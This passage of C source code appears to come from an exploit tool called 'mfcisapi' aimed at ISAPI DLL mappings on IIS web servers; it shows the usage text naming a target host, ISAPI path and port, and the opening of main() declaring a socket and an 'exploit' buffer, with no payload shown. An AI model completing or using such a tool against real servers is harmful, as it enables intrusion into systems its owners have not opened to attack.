nprintf("Usage: mfcisapi <host> <isapi> [port]\x0d\x0a\x0d\x0ahost - the address to exploit (e.g,\x0d\x0aisapi - the path of the ISAPI DLL/mapping to exploit (e.g, /ext.dll, /iisstart.asp)\x0d\x0aport - the port that the web service runs on (usually 80)");
void main(int argc, char *argv[]) {
/* Set up some stack storage... */
SOCKET hSock; /* Socket descriptor handle */
unsigned short port; /* This is set to default after WSAStartup() */
int buffsize = 1024; /* Some ISAs need bigger; set at command-line */
struct hostent *he; /* For DNS resolution */
char exploit[BUFF_SIZE]; /* BIG uninitialized buffer for the exploit. */